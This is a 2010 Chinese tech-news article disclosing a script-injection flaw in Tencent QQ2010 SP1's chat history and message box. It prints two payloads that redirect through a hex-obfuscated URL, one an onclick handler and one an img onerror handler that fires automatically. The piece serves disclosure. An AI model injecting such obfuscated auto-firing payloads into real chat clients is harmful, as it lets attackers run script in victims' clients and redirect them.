ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯业界快讯QQ腾讯2010SP1发布查看记录即现严重漏洞
站内搜索:

QQ腾讯2010SP1发布查看记录即现严重漏洞


2010/7/29  编辑:admin 来源:本站整理 

腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。

首先囧一下:脚本出错还会提示错误

image

1、消息记录的Javascript、Html标签没有屏蔽

image

2、消息盒子Javascript、Html标签没有屏蔽

image

3、www.arpun.com 小实验

1、发送代码:

以下为引用的内容:
<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

因为腾讯会自动将url转换,我们必须混淆url才能发送

image

image

image

4、超牛代码

以下为引用的内容:
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

因为要点击才能触发,想到一个不用点击就能触发的代码。

5、希望腾讯快点修复,这个漏洞非同小可

6、本漏洞由TGL发现。

QQ腾讯2010SP1发布查看记录即现严重漏洞_arp联盟 
 

注意,本代码仅供研究之用,请勿用于不当用途。

参考消息:http://www.arpun.com/如打算规避漏洞带来的风险,请下载SP0版本,看来SP1版本的changelog得修改为“更新了一些漏洞”。

更多精彩,请查看本类栏目: 新闻资讯 - 业界快讯
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/5303.html

相关文章
  • ·[图文]QQ浏览器翻译网页方法
  • ·[图文]QQ2016设置密保教程
  • ·[图文]qq音乐收录最全方力申邓丽欣合唱歌曲
  • ·QQ异常退出怎么办
  • ·[图文]如何把QQ隐藏起来
  • ·[图文]QQ登录后反复掉线怎么办
  • ·[图文]QQ群怎么指定回复一个人的消息
  • ·[图文]QQ女神红包怎么发?
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图